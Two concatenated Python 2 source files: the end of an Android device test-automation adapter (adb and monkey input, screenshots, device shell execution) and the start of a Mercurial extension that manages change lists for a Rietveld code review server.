ok, value = self._monkeyCommand("getvar " + variableName)
if ok: return value
else:
# LOG: getvar variableName failed
return None
def recvScreenSize(self):
try:
height = int(self.recvVariable("display.height"))
width = int(self.recvVariable("display.width"))
except TypeError:
return None, None
return width, height
def recvTopAppWindow(self):
_, output, _ = self._runAdb("shell dumpsys window", 0)
if self._platformVersion >= "4.2":
s = re.findall("mCurrentFocus=Window\{(#?[0-9A-Fa-f]{8})( [^ ]*)? (?P<winName>[^}]*)\}", output)
else:
s = re.findall("mCurrentFocus=Window\{(#?[0-9A-Fa-f]{8}) (?P<winName>[^ ]*) [^ ]*\}", output)
if s and len(s[0][-1].strip()) > 1: topWindowName = s[0][-1]
else: topWindowName = None
s = re.findall("mFocusedApp=AppWindowToken.*ActivityRecord\{#?[0-9A-Fa-f]{8}( [^ ]*)? (?P<appName>[^}]*)\}", output)
if s and len(s[0][-1].strip()) > 1:
topAppName = s[0][-1].strip()
else:
topAppName = None
return topAppName, topWindowName
def sendTap(self, xCoord, yCoord):
return self._monkeyCommand("tap " + str(xCoord) + " " + str(yCoord))[0]
def sendKeyUp(self, key):
return self._monkeyCommand("key up " + key)[0]
def sendKeyDown(self, key):
return self._monkeyCommand("key down " + key)[0]
def sendTouchUp(self, xCoord, yCoord):
return self._monkeyCommand("touch up " + str(xCoord) + " " + str(yCoord))[0]
def sendTouchDown(self, xCoord, yCoord):
return self._monkeyCommand("touch down " + str(xCoord) + " " + str(yCoord))[0]
def sendTouchMove(self, xCoord, yCoord):
return self._monkeyCommand("touch move " + str(xCoord) + " " + str(yCoord))[0]
def sendTrackBallMove(self, dx, dy):
return self._monkeyCommand("trackball " + str(dx) + " " + str(dy))[0]
def sendPress(self, key):
return self._monkeyCommand("press " + key)[0]
def sendType(self, text):
return self._monkeyCommand("type " + text)[0]
def screenshot(self, screenshotDir=None, imageFilename=None):
"""
Capture a screenshot and copy the image file to given path or
system temp folder.
Returns screenshot filename.
"""
if imageFilename == None:
filename = _filenameTimestamp() + "-" + self._serialNumber + '.png'
else:
filename = imageFilename
remotefile = '/sdcard/' + filename
status, _, _ = self._runAdb(['shell', 'screencap', '-p', remotefile], 0)
if status != 0: return None
if screenshotDir == None:
status, _, _ = self._runAdb(['pull', remotefile, tempfile.gettempdir()], 0)
else:
status, _, _ = self._runAdb(['pull', remotefile, os.path.join(screenshotDir, filename)], 0)
if status != 0: return None
status, _, _ = self._runAdb(['shell','rm', remotefile], 0)
if screenshotDir == None:
return os.path.join(tempfile.gettempdir(), filename)
else:
return os.path.join(screenshotDir, filename)
def shellSOE(self, shellCommand):
fd, filename = tempfile.mkstemp(prefix="fmbtandroid-shellcmd-")
remotename = '/sdcard/' + os.path.basename(filename)
os.write(fd, shellCommand + "\n")
os.close(fd)
self._runAdb("push %s %s" % (filename, remotename), 0)
cmd = "shell 'source %s >%s.out 2>%s.err; echo $? > %s.status" % ((remotename,)*4)
if self._shellSupportsTar:
# do everything we can in one command to minimise adb
# commands: execute command, record results, package,
# print uuencoded package and remove remote temp files
cmd += "; cd %s; tar czf - %s.out %s.err %s.status | uuencode %s.tar.gz; rm -f %s*'" % (
(os.path.dirname(remotename),) + ((os.path.basename(remotename),) * 5))
status, output, error = self._runAdb(cmd, 0)
file(filename, "w").write(output)
uu.decode(filename, out_file=filename + ".tar.gz")
import tarfile
tar = tarfile.open(filename + ".tar.gz")
basename = os.path.basename(filename)
stdout = tar.extractfile(basename + ".out").read()
stderr = tar.extractfile(basename + ".err").read()
try: exitstatus = int(tar.extractfile(basename + ".status").read())
except: exitstatus = None
os.remove(filename)
os.remove(filename + ".tar.gz")
else:
# need to pull files one by one, slow.
cmd += "'"
self._runAdb(cmd, 0)
stdout = self._cat(remotename + ".out")
stderr = self._cat(remotename + ".err")
try: exitstatus = int(self._cat(remotename + ".status"))
except: exitstatus = None
self._runAdb("shell rm -f %s.out %s.err %.status" % ((remotename,)*3))
return exitstatus, stdout, stderr
def recvViewData(self, retry=3):
_dataBufferLen = 4096 * 16
try:
self._windowSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._windowSocket.connect( (self._w_host, self._w_port) )
# DUMP -1: get foreground window info
if self._windowSocket.sendall("DUMP -1\n") == 0:
# LOG: readGUI cannot write to window socket
raise AdapterConnectionError("writing socket failed")
# Read until a "DONE" line
data = ""
while True:
try: newData = self._windowSocket.recv(_dataBufferLen)
except socket.timeout:
continue
data += newData
if data.splitlines()[-1] == "DONE" or newData == '':
break
return data
except Exception, msg:
_adapterLog("recvViewData: window socket error: %s" % (msg,))
if retry > 0:
self._resetWindow()
return self.recvViewData(retry=retry-1)
else:
msg = "recvViewData: cannot read window socket"
_adapterLog(msg)
raise AndroidConnectionError(msg)
finally:
try: self._windowSocket.close()
except: pass
# Exception hierarchy for device-connection failures.
class AndroidConnectionError(Exception): pass
# Connection existed but was lost mid-operation.
class AndroidConnectionLost(AndroidConnectionError): pass
# No device with the requested serial number was found.
class AndroidDeviceNotFound(AndroidConnectionError): pass
|
# coding=utf-8
# (The line above is necessary so that I can use 世界 in the
# *comment* below without Python getting all bent out of shape.)
# Copyright 2007-2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''Mercurial interface to codereview.appspot.com.
To configure, set the following options in
your repository's .hg/hgrc file.
[extensions]
codereview = /path/to/codereview.py
[codereview]
server = codereview.appspot.com
The server should be running Rietveld; see http://code.google.com/p/rietveld/.
In addition to the new commands, this extension introduces
the file pattern syntax @nnnnnn, where nnnnnn is a change list
number, to mean the files included in that change list, which
must be associated with the current client.
For example, if change 123456 contains the files x.go and y.go,
"hg diff @123456" is equivalent to "hg diff x.go y.go".
'''
import sys

# This module is a Mercurial extension: refuse direct execution.
if __name__ == "__main__":
	print >>sys.stderr, "This is a Mercurial extension and should not be invoked directly."
	sys.exit(2)

# We require Python 2.6 for the json package.
if sys.version < '2.6':
	print >>sys.stderr, "The codereview extension requires Python 2.6 or newer."
	print >>sys.stderr, "You are running Python " + sys.version
	sys.exit(2)

import json
import os
import re
import stat
import subprocess
import threading
import time

from mercurial import commands as hg_commands
from mercurial import util as hg_util

# Module-level state, filled in from hgrc configuration at load time.
defaultcc = None
codereview_disabled = None
real_rollback = None
releaseBranch = None
server = "codereview.appspot.com"
server_url_base = None
#######################################################################
# Normally I would split this into multiple files, but it simplifies
# import path headaches to keep it all in one file. Sorry.
# The different parts of the file are separated by banners like this one.
#######################################################################
# Helpers
def RelativePath(path, cwd):
	"""Return path relative to cwd if it lies under cwd, else path unchanged."""
	n = len(cwd)
	# BUGFIX: slice (path[n:n+1]) instead of index so that path == cwd
	# does not raise IndexError.
	if path.startswith(cwd) and path[n:n+1] == '/':
		return path[n+1:]
	return path
def Sub(l1, l2):
	"""Return the elements of l1 that do not appear in l2, keeping l1's order."""
	remaining = []
	for element in l1:
		if element not in l2:
			remaining.append(element)
	return remaining
def Add(l1, l2):
	"""Return the sorted union of l1 and l2 (elements of l2 already in l1
	are not duplicated)."""
	merged = l1 + [element for element in l2 if element not in l1]
	return sorted(merged)
def Intersect(l1, l2):
	"""Return the elements of l1 that also appear in l2, keeping l1's order."""
	common = []
	for element in l1:
		if element in l2:
			common.append(element)
	return common
#######################################################################
# RE: UNICODE STRING HANDLING
#
# Python distinguishes between the str (string of bytes)
# and unicode (string of code points) types. Most operations
# work on either one just fine, but some (like regexp matching)
# require unicode, and others (like write) require str.
#
# As befits the language, Python hides the distinction between
# unicode and str by converting between them silently, but
# *only* if all the bytes/code points involved are 7-bit ASCII.
# This means that if you're not careful, your program works
# fine on "hello, world" and fails on "hello, 世界". And of course,
# the obvious way to be careful - use static types - is unavailable.
# So the only way is trial and error to find where to put explicit
# conversions.
#
# Because more functions do implicit conversion to str (string of bytes)
# than do implicit conversion to unicode (string of code points),
# the convention in this module is to represent all text as str,
# converting to unicode only when calling a unicode-only function
# and then converting back to str as soon as possible.
def typecheck(s, t):
	"""Ensure that s has exactly type t; abort with a clear message otherwise."""
	if type(s) == t:
		return
	message = "type check failed: %s has type %s != %s" % (repr(s), type(s), t)
	raise hg_util.Abort(message)
# If we have to pass unicode instead of str, ustr does that conversion clearly.
# If we have to pass unicode instead of str, ustr does that conversion clearly.
def ustr(s):
	# Decode a UTF-8 byte string into a unicode string (Python 2).
	typecheck(s, str)
	return s.decode("utf-8")
# Even with those, Mercurial still sometimes turns unicode into str
# and then tries to use it as ascii. Change Mercurial's default.
def set_mercurial_encoding_to_utf8():
	# Force Mercurial's internal text encoding to UTF-8 so it does not
	# fall back to ascii when converting unicode to str.
	from mercurial import encoding
	encoding.encoding = 'utf-8'

set_mercurial_encoding_to_utf8()
# Even with those we still run into problems.
# I tried to do things by the book but could not convince
# Mercurial to let me check in a change with UTF-8 in the
# CL description or author field, no matter how many conversions
# between str and unicode I inserted and despite changing the
# default encoding. I'm tired of this game, so set the default
# encoding for all of Python to 'utf-8', not 'ascii'.
def default_to_utf8():
	# Restore setdefaultencoding (deleted by site.py) via reload(sys)
	# and switch the process-wide default encoding to UTF-8.
	import sys
	stdout, __stdout__ = sys.stdout, sys.__stdout__
	reload(sys) # site.py deleted setdefaultencoding; get it back
	# reload(sys) resets stdout; restore the saved streams.
	sys.stdout, sys.__stdout__ = stdout, __stdout__
	sys.setdefaultencoding('utf-8')

default_to_utf8()
#######################################################################
# Status printer for long-running commands
# Current long-running-operation status line, shown by StatusThread.
global_status = None

def set_status(s):
	# Record the status message for the background status printer.
	# print >>sys.stderr, "\t", time.asctime(), s
	global global_status
	global_status = s
class StatusThread(threading.Thread):
	"""Background thread that periodically prints global_status to stderr
	during long-running commands."""
	def __init__(self):
		threading.Thread.__init__(self)
	def run(self):
		# pause a reasonable amount of time before
		# starting to display status messages, so that
		# most hg commands won't ever see them.
		time.sleep(30)

		# now show status every 15 seconds
		while True:
			# Sleep until the next 15-second boundary.
			time.sleep(15 - time.time() % 15)
			s = global_status
			if s is None:
				continue
			if s == "":
				s = "(unknown status)"
			print >>sys.stderr, time.asctime(), s
def start_status_thread():
	# Launch the status printer as a daemon so it never blocks exit.
	t = StatusThread()
	t.setDaemon(True) # allowed to exit if t is still running
	t.start()
#######################################################################
# Change list parsing.
#
# Change lists are stored in .hg/codereview/cl.nnnnnn
# where nnnnnn is the number assigned by the code review server.
# Most data about a change list is stored on the code review server
# too: the description, reviewer, and cc list are all stored there.
# The only thing in the cl.nnnnnn file is the list of relevant files.
# Also, the existence of the cl.nnnnnn file marks this repository
# as the one where the change list lives.
# Placeholder diff uploaded when a CL is created with no files yet
# (see CL.Upload): the server requires a patch set even for an empty CL.
emptydiff = """Index: ~rietveld~placeholder~
===================================================================
diff --git a/~rietveld~placeholder~ b/~rietveld~placeholder~
new file mode 100644
"""
class CL(object):
	"""In-memory representation of a change list.

	Most CL data (description, reviewers, cc) lives on the code review
	server; the local cl.nnnnnn file records the file list and a few
	flags. The name "new" marks a CL not yet assigned a server number.
	"""
	def __init__(self, name):
		typecheck(name, str)
		self.name = name
		self.desc = ''
		self.files = []
		self.reviewer = []
		self.cc = []
		self.url = ''
		self.local = False
		self.web = False
		self.copied_from = None	# None means current user
		self.mailed = False
		self.private = False
		self.lgtm = []

	def DiskText(self):
		# Serialization written to .hg/codereview/cl.nnnnnn.
		cl = self
		s = ""
		if cl.copied_from:
			s += "Author: " + cl.copied_from + "\n\n"
		if cl.private:
			s += "Private: " + str(self.private) + "\n"
		s += "Mailed: " + str(self.mailed) + "\n"
		s += "Description:\n"
		s += Indent(cl.desc, "\t")
		s += "Files:\n"
		for f in cl.files:
			s += "\t" + f + "\n"
		typecheck(s, str)
		return s

	def EditorText(self):
		# Text presented to the user for interactive editing.
		cl = self
		s = _change_prolog
		s += "\n"
		if cl.copied_from:
			s += "Author: " + cl.copied_from + "\n"
		if cl.url != '':
			s += 'URL: ' + cl.url + '	# cannot edit\n\n'
		if cl.private:
			s += "Private: True\n"
		s += "Reviewer: " + JoinComma(cl.reviewer) + "\n"
		s += "CC: " + JoinComma(cl.cc) + "\n"
		s += "\n"
		s += "Description:\n"
		if cl.desc == '':
			s += "\t<enter description here>\n"
		else:
			s += Indent(cl.desc, "\t")
		s += "\n"
		if cl.local or cl.name == "new":
			s += "Files:\n"
			for f in cl.files:
				s += "\t" + f + "\n"
			s += "\n"
		typecheck(s, str)
		return s

	def PendingText(self, quick=False):
		# One-CL summary used by the pending command; quick skips
		# reviewer/cc/file details.
		cl = self
		s = cl.name + ":" + "\n"
		s += Indent(cl.desc, "\t")
		s += "\n"
		if cl.copied_from:
			s += "\tAuthor: " + cl.copied_from + "\n"
		if not quick:
			s += "\tReviewer: " + JoinComma(cl.reviewer) + "\n"
			for (who, line) in cl.lgtm:
				s += "\t\t" + who + ": " + line + "\n"
			s += "\tCC: " + JoinComma(cl.cc) + "\n"
			s += "\tFiles:\n"
			for f in cl.files:
				s += "\t\t" + f + "\n"
		typecheck(s, str)
		return s

	def Flush(self, ui, repo):
		# Persist the CL to disk (atomically via a '!' temp file) and,
		# for CLs we own, push metadata back to the server.
		if self.name == "new":
			self.Upload(ui, repo, gofmt_just_warn=True, creating=True)
		dir = CodeReviewDir(ui, repo)
		path = dir + '/cl.' + self.name
		f = open(path+'!', "w")
		f.write(self.DiskText())
		f.close()
		if sys.platform == "win32" and os.path.isfile(path):
			os.remove(path)
		os.rename(path+'!', path)
		if self.web and not self.copied_from:
			EditDesc(self.name, desc=self.desc,
				reviewers=JoinComma(self.reviewer), cc=JoinComma(self.cc),
				private=self.private)

	def Delete(self, ui, repo):
		# Remove the on-disk record of this CL.
		dir = CodeReviewDir(ui, repo)
		os.unlink(dir + "/cl." + self.name)

	def Subject(self):
		# First line of the description, truncated, prefixed with the
		# CL number once one has been assigned.
		s = line1(self.desc)
		if len(s) > 60:
			s = s[0:55] + "..."
		if self.name != "new":
			s = "code review %s: %s" % (self.name, s)
		typecheck(s, str)
		return s

	def Upload(self, ui, repo, send_mail=False, gofmt=True, gofmt_just_warn=False, creating=False, quiet=False):
		# Upload CL metadata and diffs to the code review server.
		if not self.files and not creating:
			ui.warn("no files in change list\n")
		if ui.configbool("codereview", "force_gofmt", True) and gofmt:
			CheckFormat(ui, repo, self.files, just_warn=gofmt_just_warn)
		set_status("uploading CL metadata + diffs")
		os.chdir(repo.root)
		form_fields = [
			("content_upload", "1"),
			("reviewers", JoinComma(self.reviewer)),
			("cc", JoinComma(self.cc)),
			("description", self.desc),
			("base_hashes", ""),
		]

		if self.name != "new":
			form_fields.append(("issue", self.name))
		vcs = None
		# We do not include files when creating the issue,
		# because we want the patch sets to record the repository
		# and base revision they are diffs against. We use the patch
		# set message for that purpose, but there is no message with
		# the first patch set. Instead the message gets used as the
		# new CL's overall subject. So omit the diffs when creating
		# and then we'll run an immediate upload.
		# This has the effect that every CL begins with an empty "Patch set 1".
		if self.files and not creating:
			vcs = MercurialVCS(upload_options, ui, repo)
			data = vcs.GenerateDiff(self.files)
			files = vcs.GetBaseFiles(data)
			if len(data) > MAX_UPLOAD_SIZE:
				# Too big for one request: upload patches separately.
				uploaded_diff_file = []
				form_fields.append(("separate_patches", "1"))
			else:
				uploaded_diff_file = [("data", "data.diff", data)]
		else:
			uploaded_diff_file = [("data", "data.diff", emptydiff)]

		if vcs and self.name != "new":
			form_fields.append(("subject", "diff -r " + vcs.base_rev + " " + ui.expandpath("default")))
		else:
			# First upload sets the subject for the CL itself.
			form_fields.append(("subject", self.Subject()))
		ctype, body = EncodeMultipartFormData(form_fields, uploaded_diff_file)
		response_body = MySend("/upload", body, content_type=ctype)
		patchset = None
		msg = response_body
		lines = msg.splitlines()
		if len(lines) >= 2:
			msg = lines[0]
			patchset = lines[1].strip()
			patches = [x.split(" ", 1) for x in lines[2:]]
		if response_body.startswith("Issue updated.") and quiet:
			pass
		else:
			ui.status(msg + "\n")
		set_status("uploaded CL metadata + diffs")
		if not response_body.startswith("Issue created.") and not response_body.startswith("Issue updated."):
			raise hg_util.Abort("failed to update issue: " + response_body)
		issue = msg[msg.rfind("/")+1:]
		self.name = issue
		if not self.url:
			self.url = server_url_base + self.name
		if not uploaded_diff_file:
			set_status("uploading patches")
			patches = UploadSeparatePatches(issue, rpc, patchset, data, upload_options)
		if vcs:
			set_status("uploading base files")
			vcs.UploadBaseFiles(issue, rpc, patches, patchset, upload_options, files)
		if send_mail:
			set_status("sending mail")
			MySend("/" + issue + "/mail", payload="")
		self.web = True
		set_status("flushing changes to disk")
		self.Flush(ui, repo)
		return

	def Mail(self, ui, repo):
		# Post a review-request message on the server for this CL.
		pmsg = "Hello " + JoinComma(self.reviewer)
		if self.cc:
			pmsg += " (cc: %s)" % (', '.join(self.cc),)
		pmsg += ",\n"
		pmsg += "\n"
		repourl = ui.expandpath("default")
		if not self.mailed:
			pmsg += "I'd like you to review this change to\n" + repourl + "\n"
		else:
			pmsg += "Please take another look.\n"
		typecheck(pmsg, str)
		PostMessage(ui, self.name, pmsg, subject=self.Subject())
		self.mailed = True
		self.Flush(ui, repo)
def GoodCLName(name):
    """Report whether name looks like a CL number (decimal digits only)."""
    typecheck(name, str)
    digits_only = re.match("^[0-9]+$", name)
    return digits_only
def ParseCL(text, name):
    """Parse the on-disk/editor CL text format into a CL object.

    Returns (cl, 0, '') on success, or (None, lineno, errormsg) on a
    parse error at the given line number.
    """
    typecheck(text, str)
    typecheck(name, str)
    # sname is the name of the section currently being accumulated, or None.
    sname = None
    lineno = 0
    sections = {
        'Author': '',
        'Description': '',
        'Files': '',
        'URL': '',
        'Reviewer': '',
        'CC': '',
        'Mailed': '',
        'Private': '',
    }
    for line in text.split('\n'):
        lineno += 1
        line = line.rstrip()
        # Lines starting with '#' are comments.
        if line != '' and line[0] == '#':
            continue
        # Blank or indented lines continue the current section.
        if line == '' or line[0] == ' ' or line[0] == '\t':
            if sname == None and line != '':
                return None, lineno, 'text outside section'
            if sname != None:
                sections[sname] += line + '\n'
            continue
        # Anything else must be a "Name: value" section header.
        p = line.find(':')
        if p >= 0:
            s, val = line[:p].strip(), line[p+1:].strip()
            if s in sections:
                sname = s
                if val != '':
                    sections[sname] += val + '\n'
                continue
        return None, lineno, 'malformed section header'
    # Normalize each section: drop common indentation and trailing space.
    for k in sections:
        sections[k] = StripCommon(sections[k]).rstrip()
    cl = CL(name)
    if sections['Author']:
        cl.copied_from = sections['Author']
    cl.desc = sections['Description']
    for line in sections['Files'].split('\n'):
        # File lines may carry trailing '#' comments; strip them.
        i = line.find('#')
        if i >= 0:
            line = line[0:i].rstrip()
        line = line.strip()
        if line == '':
            continue
        cl.files.append(line)
    cl.reviewer = SplitCommaSpace(sections['Reviewer'])
    cl.cc = SplitCommaSpace(sections['CC'])
    cl.url = sections['URL']
    if sections['Mailed'] != 'False':
        # Odd default, but avoids spurious mailings when
        # reading old CLs that do not have a Mailed: line.
        # CLs created with this update will always have
        # Mailed: False on disk.
        cl.mailed = True
    if sections['Private'] in ('True', 'true', 'Yes', 'yes'):
        cl.private = True
    # The editor-template placeholder counts as no description.
    if cl.desc == '<enter description here>':
        cl.desc = ''
    return cl, 0, ''
def SplitCommaSpace(s):
    """Split s on commas (each optionally followed by spaces); '' -> []."""
    typecheck(s, str)
    trimmed = s.strip()
    if not trimmed:
        return []
    return re.split(", *", trimmed)
def CutDomain(s):
    """Return s truncated at the first '@' (strips an email's domain)."""
    typecheck(s, str)
    at = s.find('@')
    if at < 0:
        return s
    return s[0:at]
def JoinComma(l):
    """Join a list of strings with ', ', type-checking every element."""
    for item in l:
        typecheck(item, str)
    return ", ".join(l)
def ExceptionDetail():
    """Format the exception currently being handled as 'TypeName: argument'."""
    s = str(sys.exc_info()[0])
    # str() of an exception type renders as "<type 'X'>" (Python 2)
    # or "<class 'X'>" (new-style / Python 3); keep only X.
    for prefix, start in (("<type '", 7), ("<class '", 8)):
        if s.startswith(prefix) and s.endswith("'>"):
            s = s[start:-2]
            break
    arg = str(sys.exc_info()[1])
    if arg:
        s += ": " + arg
    return s
def IsLocalCL(ui, repo, name):
    """Report whether name is a valid CL number with a local cl.<name> file."""
    m = GoodCLName(name)
    if not m:
        return m
    return os.access(CodeReviewDir(ui, repo) + "/cl." + name, 0)
# Load CL from disk and/or the web.
def LoadCL(ui, repo, name, web=True):
    """Load CL `name` from the local cl.<name> file (if present) and,
    when web is True, merge in issue metadata fetched from the code
    review server.

    Returns (cl, '') on success or (None, errormsg) on failure.
    """
    typecheck(name, str)
    set_status("loading CL " + name)
    if not GoodCLName(name):
        return None, "invalid CL name"
    dir = CodeReviewDir(ui, repo)
    path = dir + "cl." + name
    if os.access(path, 0):
        ff = open(path)
        text = ff.read()
        ff.close()
        cl, lineno, err = ParseCL(text, name)
        if err != "":
            return None, "malformed CL data: "+err
        cl.local = True
    else:
        cl = CL(name)
    if web:
        set_status("getting issue metadata from web")
        d = JSONGet(ui, "/api/" + name + "?messages=true")
        set_status(None)
        if d is None:
            return None, "cannot load CL %s from server" % (name,)
        # Sanity-check the server response before trusting it.
        if 'owner_email' not in d or 'issue' not in d or str(d['issue']) != name:
            return None, "malformed response loading CL data from code review server"
        cl.dict = d
        cl.reviewer = d.get('reviewers', [])
        cl.cc = d.get('cc', [])
        if cl.local and cl.copied_from and cl.desc:
            # local copy of CL written by someone else
            # and we saved a description.  use that one,
            # so that committers can edit the description
            # before doing hg submit.
            pass
        else:
            cl.desc = d.get('description', "")
        cl.url = server_url_base + name
        cl.web = True
        cl.private = d.get('private', False) != False
        # Collect LGTMs as (sender-without-domain, first line of message).
        cl.lgtm = []
        for m in d.get('messages', []):
            if m.get('approval', False) == True:
                who = re.sub('@.*', '', m.get('sender', ''))
                text = re.sub("\n(.|\n)*", '', m.get('text', ''))
                cl.lgtm.append((who, text))
    set_status("loaded CL " + name)
    return cl, ''
class LoadCLThread(threading.Thread):
    """Worker thread that loads a single CL file.

    The result is left in self.cl (None if loading failed).
    """
    def __init__(self, ui, repo, dir, f, web):
        threading.Thread.__init__(self)
        self.ui = ui
        self.repo = repo
        self.dir = dir
        self.f = f
        self.web = web
        self.cl = None
    def run(self):
        # File names look like "cl.<number>"; drop the "cl." prefix.
        name = self.f[3:]
        loaded, err = LoadCL(self.ui, self.repo, name, web=self.web)
        if err != '':
            self.ui.warn("loading " + self.dir + self.f + ": " + err + "\n")
            return
        self.cl = loaded
# Load all the CLs from this repository.
def LoadAllCL(ui, repo, web=True):
    """Return a dict mapping CL name -> CL for every cl.* file in the repo.

    CLs are loaded on parallel threads; the first web request is waited
    for by itself so any authentication prompt happens only once.
    """
    dir = CodeReviewDir(ui, repo)
    m = {}
    files = [f for f in os.listdir(dir) if f.startswith('cl.')]
    if not files:
        return m
    active = []
    first = True
    for f in files:
        t = LoadCLThread(ui, repo, dir, f, web)
        t.start()
        if web and first:
            # first request: wait in case it needs to authenticate
            # otherwise we get lots of user/password prompts
            # running in parallel.
            t.join()
            if t.cl:
                m[t.cl.name] = t.cl
            first = False
        else:
            active.append(t)
    # Collect the remaining threads' results.
    for t in active:
        t.join()
        if t.cl:
            m[t.cl.name] = t.cl
    return m
# Find repository root.  On error, ui.warn and return None
def RepoDir(ui, repo):
    """Return the repository root as a local filesystem path, or None."""
    url = repo.url()
    if not url.startswith('file:'):
        ui.warn("repository %s is not in local file system\n" % (url,))
        return None
    url = url[len('file:'):]
    if url.endswith('/'):
        url = url[:-1]
    typecheck(url, str)
    return url
# Find (or make) code review directory.  On error, ui.warn and return None
def CodeReviewDir(ui, repo):
    """Return <repo root>/.hg/codereview/ (trailing slash), creating it if needed."""
    dir = RepoDir(ui, repo)
    if dir == None:
        return None
    dir += '/.hg/codereview/'
    if not os.path.isdir(dir):
        try:
            # Mode 0700 restricts the directory to the owner.
            os.mkdir(dir, 0700)
        except:
            ui.warn('cannot mkdir %s: %s\n' % (dir, ExceptionDetail()))
            return None
    typecheck(dir, str)
    return dir
# Turn leading tabs into spaces, so that the common white space
# prefix doesn't get confused when people's editors write out
# some lines with spaces, some with tabs.  Only a heuristic
# (some editors don't use 8 spaces either) but a useful one.
def TabsToSpaces(line):
    """Replace each leading tab of line with eight spaces."""
    ntabs = 0
    while ntabs < len(line) and line[ntabs] == '\t':
        ntabs += 1
    return '        ' * ntabs + line[ntabs:]
# Strip maximal common leading white space prefix from text
def StripCommon(text):
    """Remove the longest whitespace prefix shared by all nonblank lines."""
    typecheck(text, str)
    # Pass 1: compute the common whitespace prefix ws of nonblank lines.
    ws = None
    for raw in text.split('\n'):
        line = TabsToSpaces(raw.rstrip())
        if line == '':
            continue
        white = line[:len(line) - len(line.lstrip())]
        if ws is None:
            ws = white
        else:
            # Shrink ws to the common prefix of ws and white.
            n = 0
            limit = min(len(ws), len(white))
            while n < limit and ws[n] == white[n]:
                n += 1
            ws = ws[:n]
        if ws == '':
            break
    if ws is None:
        # No nonblank lines at all: nothing to strip.
        return text
    # Pass 2: rebuild the text with the prefix removed, dropping
    # leading blank lines and collapsing trailing blank lines.
    t = ''
    for raw in text.split('\n'):
        line = TabsToSpaces(raw.rstrip())
        if line.startswith(ws):
            line = line[len(ws):]
        if line == '' and t == '':
            continue
        t += line + '\n'
    while t.endswith('\n\n'):
        t = t[:-1]
    typecheck(t, str)
    return t
# Indent text with indent.
def Indent(text, indent):
    """Prefix every line of text with indent; the result ends in a newline."""
    typecheck(text, str)
    typecheck(indent, str)
    t = ''.join([indent + line + '\n' for line in text.split('\n')])
    typecheck(t, str)
    return t
# Return the first line of l
def line1(text):
    """Return text up to (not including) the first newline."""
    typecheck(text, str)
    first, _, _ = text.partition('\n')
    return first
_change_prolog = """# Change list.
# Lines beginning with # are ignored.
# Multi-line values should be indented.
"""
desc_re = '^(.+: |(tag )?(release|weekly)\.|fix build|undo CL)'
desc_msg = '''Your CL description appears not to use the standard form.
The first line of your change description is conventionally a
one-line summary of the change, prefixed by the primary affected package,
and is used as the subject for code review mail; the rest of the description
elaborates.
Examples:
encoding/rot13: new package
math: add IsInf, IsNaN
net: fix cname in LookupHost
unicode: update to Unicode 5.0.2
'''
def promptyesno(ui, msg):
    """Ask a yes/no question; the default answer is yes."""
    answer = ui.promptchoice(msg, ["&yes", "&no"], 0)
    return answer == 0
def promptremove(ui, repo, f):
    """Offer to 'hg remove' f; warn if the removal fails."""
    if not promptyesno(ui, "hg remove %s (y/n)?" % (f,)):
        return
    if hg_commands.remove(ui, repo, 'path:'+f) != 0:
        ui.warn("error removing %s" % (f,))
def promptadd(ui, repo, f):
    """Offer to 'hg add' f; warn if the add fails."""
    if not promptyesno(ui, "hg add %s (y/n)?" % (f,)):
        return
    if hg_commands.add(ui, repo, 'path:'+f) != 0:
        ui.warn("error adding %s" % (f,))
def EditCL(ui, repo, cl):
    """Open cl in the user's editor and fold the edited text back into cl.

    Re-prompts until the text parses and passes sanity checks (or the
    user declines to re-edit).  Returns '' on success, else an error string.
    """
    set_status(None)	# do not show status
    s = cl.EditorText()
    while True:
        s = ui.edit(s, ui.username())

        # We can't trust Mercurial + Python not to die before making the change,
        # so, by popular demand, just scribble the most recent CL edit into
        # $(hg root)/last-change so that if Mercurial does die, people
        # can look there for their work.
        try:
            f = open(repo.root+"/last-change", "w")
            f.write(s)
            f.close()
        except:
            pass

        clx, line, err = ParseCL(s, cl.name)
        if err != '':
            if not promptyesno(ui, "error parsing change list: line %d: %s\nre-edit (y/n)?" % (line, err)):
                return "change list not modified"
            continue

        # Check description.
        if clx.desc == '':
            if promptyesno(ui, "change list should have a description\nre-edit (y/n)?"):
                continue
        elif re.search('<enter reason for undo>', clx.desc):
            # Undo CLs must have the placeholder replaced with a real reason.
            if promptyesno(ui, "change list description omits reason for undo\nre-edit (y/n)?"):
                continue
        elif not re.match(desc_re, clx.desc.split('\n')[0]):
            if promptyesno(ui, desc_msg + "re-edit (y/n)?"):
                continue

        # Check file list for files that need to be hg added or hg removed
        # or simply aren't understood.
        pats = ['path:'+f for f in clx.files]
        changed = hg_matchPattern(ui, repo, *pats, modified=True, added=True, removed=True)
        deleted = hg_matchPattern(ui, repo, *pats, deleted=True)
        unknown = hg_matchPattern(ui, repo, *pats, unknown=True)
        ignored = hg_matchPattern(ui, repo, *pats, ignored=True)
        clean = hg_matchPattern(ui, repo, *pats, clean=True)
        files = []
        for f in clx.files:
            if f in changed:
                files.append(f)
                continue
            if f in deleted:
                promptremove(ui, repo, f)
                files.append(f)
                continue
            if f in unknown:
                promptadd(ui, repo, f)
                files.append(f)
                continue
            if f in ignored:
                ui.warn("error: %s is excluded by .hgignore; omitting\n" % (f,))
                continue
            if f in clean:
                ui.warn("warning: %s is listed in the CL but unchanged\n" % (f,))
                files.append(f)
                continue
            # Not known to hg at all: keep plain files (with a warning),
            # drop directories and nonexistent paths.
            p = repo.root + '/' + f
            if os.path.isfile(p):
                ui.warn("warning: %s is a file but not known to hg\n" % (f,))
                files.append(f)
                continue
            if os.path.isdir(p):
                ui.warn("error: %s is a directory, not a file; omitting\n" % (f,))
                continue
            ui.warn("error: %s does not exist; omitting\n" % (f,))
        clx.files = files

        # All checks passed: copy the edited fields into the caller's CL.
        cl.desc = clx.desc
        cl.reviewer = clx.reviewer
        cl.cc = clx.cc
        cl.files = clx.files
        cl.private = clx.private
        break
    return ""
# For use by submit, etc. (NOT by change)
# Get change list number or list of files from command line.
# If files are given, make a new change list.
def CommandLineCL(ui, repo, pats, opts, defaultcc=None):
    """Resolve command-line arguments into a CL object.

    pats is either a single CL number or a list of file patterns
